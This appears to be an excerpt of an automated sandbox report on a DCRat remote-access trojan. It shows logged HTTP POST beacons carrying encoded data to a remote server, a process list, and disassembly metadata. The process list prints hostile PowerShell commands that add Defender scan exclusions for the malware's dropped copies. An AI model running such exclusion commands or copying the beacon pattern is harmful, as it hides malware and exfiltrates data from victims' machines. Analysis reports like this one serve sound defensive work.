115 | 192.168.2.4 | 50122 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:58.231065035 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:58.582638025 CET | 2568 | OUT | Data Raw: 5b 54 5b 5b 58 58 50 5d 54 5b 59 5a 5b 57 57 5d 5f 53 5a 54 52 57 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T[[XXP]T[YZ[WW]_SZTRWPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?>""2$@=(!07)%""45W4+(X0?00?9#Y'$X.9
Jan 3, 2025 09:08:58.934947014 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:59.066900015 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:58 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.4 | 50123 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:59.194683075 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2564
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:08:59.551453114 CET | 2564 | OUT | Data Raw: 5b 57 5e 5e 58 5f 50 50 54 5b 59 5a 5b 57 57 5b 5f 5c 5a 58 52 57 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^^X_PPT[YZ[WW[_\ZXRWPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B<*5:<V%<@="X3>1Y!R 4&7<%) A0<'(9#Y'$X.
Jan 3, 2025 09:08:59.902986050 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:09:00.034199953 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:59 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.4 | 50124 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:09:00.163208961 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:09:00.860773087 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:09:10.868196011 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:09:00 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
Jan 3, 2025 09:09:20.965403080 CET | 2576 | OUT | Data Raw: 5e 50 5b 5a 58 5a 50 5b 54 5b 59 5a 5b 50 57 5d 5f 51 5a 58 52 5c 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^P[ZXZP[T[YZ[PW]_QZXR\PE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<%!(U%Z?)(53$&/"6W48$Y'$@$/T<#Y'$X.



                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:03:06:53
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\zZ1Y43bxxV.exe"
                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                  File size:2'615'296 bytes
                                                                                                                                                                  MD5 hash:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.1643692191.00000000000D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:1
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe'
                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:2
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\mozilla maintenance service\logs\StartMenuExperienceHost.exe'
                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:3
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:4
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\UserOOBEBroker.exe'
                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:5
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:6
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe'
                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:7
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:8
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe'
                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:9
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:10
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:11
                                                                                                                                                                  Start time:03:06:57
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat"
                                                                                                                                                                  Imagebase:0x7ff727490000
                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:12
                                                                                                                                                                  Start time:03:06:58
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:13
                                                                                                                                                                  Start time:03:06:59
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:chcp 65001
                                                                                                                                                                  Imagebase:0x7ff60e5e0000
                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:14
                                                                                                                                                                  Start time:03:06:59
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:ping -n 10 localhost
                                                                                                                                                                  Imagebase:0x7ff786a20000
                                                                                                                                                                  File size:22'528 bytes
                                                                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:15
                                                                                                                                                                  Start time:03:07:04
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                                                                  File size:496'640 bytes
                                                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:16
                                                                                                                                                                  Start time:03:07:08
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe"
                                                                                                                                                                  Imagebase:0x820000
                                                                                                                                                                  File size:2'615'296 bytes
                                                                                                                                                                  MD5 hash:CDAC978772A7616686C0EFE2727CE902
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2909009031.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 78%, ReversingLabs
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Target ID:19
                                                                                                                                                                  Start time:03:07:14
                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false


                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:12.1%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                    Signature Coverage:6.9%
                                                                                                                                                                    Total number of Nodes:29
                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                    [Execution graph omitted. API calls on its nodes: VirtualAlloc, WriteFile, CreateFileTransactedW, ResumeThread, GetSystemInfo]

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: "$H$[$[$\$]$]$u${${$}$}
                                                                                                                                                                    • API String ID: 0-2063274034
                                                                                                                                                                    • Opcode ID: aa414e87f64567a571f846941d0bd65914e474bd866363aac04102d97b25de2b
                                                                                                                                                                    • Instruction ID: 5dac4abfeba3a874b3f44ceb329917888fb448390472eb67376bff8fbc3e7db2
                                                                                                                                                                    • Opcode Fuzzy Hash: aa414e87f64567a571f846941d0bd65914e474bd866363aac04102d97b25de2b
                                                                                                                                                                    • Instruction Fuzzy Hash: E7D2B670E1962D8FDBA8DF68C894BA9B7B1FF59301F5041EAD01DE3295DA346A81CF40
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                    • Opcode ID: 389d9964bf8d5eccbbfd88e9319b968a403f833b7487caa47ae82a1af16f002b
                                                                                                                                                                    • Instruction ID: fbee95f86c37fd651c2c666f1000245a0333fafa73a1c90cef00167bf0fef293
                                                                                                                                                                    • Opcode Fuzzy Hash: 389d9964bf8d5eccbbfd88e9319b968a403f833b7487caa47ae82a1af16f002b
                                                                                                                                                                    • Instruction Fuzzy Hash: 7D51E33090DA5C8FDB99DFA8D859AE9BBF0FF59310F0041ABD04DD72A2DA346946CB40
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 54f40d5dd1bb9bb1feaec052e3ea4ba73b4f1ef77ab57c36dc3cc984783b8137
                                                                                                                                                                    • Instruction ID: 62bf92cbdd1f793350b4d21a1ad52cbec7ea785787401bb2aa2db073aee4b1bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 54f40d5dd1bb9bb1feaec052e3ea4ba73b4f1ef77ab57c36dc3cc984783b8137
                                                                                                                                                                    • Instruction Fuzzy Hash: 45525970A1961D8FDB68DF54C4A0BF977B2FF58304F5041ADD05EAB292CB38AA46DB40

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: a._L
                                                                                                                                                                    • API String ID: 0-3527698608
                                                                                                                                                                    • Opcode ID: 8915683208598b740e3eba4c31cb420280605d94c1515b7b2e6d9f49d53ec3c9
                                                                                                                                                                    • Instruction ID: eed451c1d92e142d5ac76885440087efd5f2ed7e809f186915eeaece19450b5f
                                                                                                                                                                    • Opcode Fuzzy Hash: 8915683208598b740e3eba4c31cb420280605d94c1515b7b2e6d9f49d53ec3c9
                                                                                                                                                                    • Instruction Fuzzy Hash: A4329430B19A1D8FDBA8DB58C8A5A7977E1FF54310F1141B9D00EC76A6EA78AD41CF80

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1618 7ffd9b8bd04a-7ffd9b8bd057 1619 7ffd9b8bd059-7ffd9b8bd061 1618->1619 1620 7ffd9b8bd062-7ffd9b8bd128 1618->1620 1619->1620 1624 7ffd9b8bd12a-7ffd9b8bd141 1620->1624 1625 7ffd9b8bd144-7ffd9b8bd266 CreateFileTransactedW 1620->1625 1624->1625 1626 7ffd9b8bd268 1625->1626 1627 7ffd9b8bd26e-7ffd9b8bd2f0 1625->1627 1626->1627
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFileTransacted
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2149338676-0
                                                                                                                                                                    • Opcode ID: 8d66c9155691f047349d15598143e216cf3ce13585badbd526f14493f1d5bb0b
                                                                                                                                                                    • Instruction ID: 114135b5513c7c00faa3b41a102d116ae6c10045279a8b8df99d220d9d907cf7
                                                                                                                                                                    • Opcode Fuzzy Hash: 8d66c9155691f047349d15598143e216cf3ce13585badbd526f14493f1d5bb0b
                                                                                                                                                                    • Instruction Fuzzy Hash: F9913130908A5D8FDB99DF58C894BA9BBF1FB6A310F1001AED04DE3291DB75A984CF44

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1717 7ffd9b9207d0-7ffd9b9207d9 1718 7ffd9b920823-7ffd9b920826 1717->1718 1719 7ffd9b9207db-7ffd9b920804 1717->1719 1720 7ffd9b920828-7ffd9b920830 1718->1720 1721 7ffd9b9208a7-7ffd9b9208dd 1718->1721 1722 7ffd9b920806 1719->1722 1723 7ffd9b92080b-7ffd9b920820 1719->1723 1725 7ffd9b920835-7ffd9b920871 call 7ffd9b8bd860 call 7ffd9b8bd850 1720->1725 1726 7ffd9b9208e0-7ffd9b9209b2 ResumeThread 1721->1726 1727 7ffd9b9208df 1721->1727 1722->1723 1730 7ffd9b920822 1723->1730 1731 7ffd9b920891-7ffd9b920895 1723->1731 1744 7ffd9b920873-7ffd9b920879 call 7ffd9b920897 1725->1744 1740 7ffd9b9209b4 1726->1740 1741 7ffd9b9209ba-7ffd9b920a04 1726->1741 1727->1726 1730->1718 1731->1721 1740->1741 1748 7ffd9b92087e-7ffd9b920890 1744->1748 1748->1731
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1763457876.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: fbda4a75c93eddc2b017be4f5d08d8fdb3d722782436000c7954ffd970e2a439
                                                                                                                                                                    • Instruction ID: 279f9e2dc3619a9165269f70a0e1e1d32ee8ea973d2d924c4f91dbcfd3fe76db
                                                                                                                                                                    • Opcode Fuzzy Hash: fbda4a75c93eddc2b017be4f5d08d8fdb3d722782436000c7954ffd970e2a439
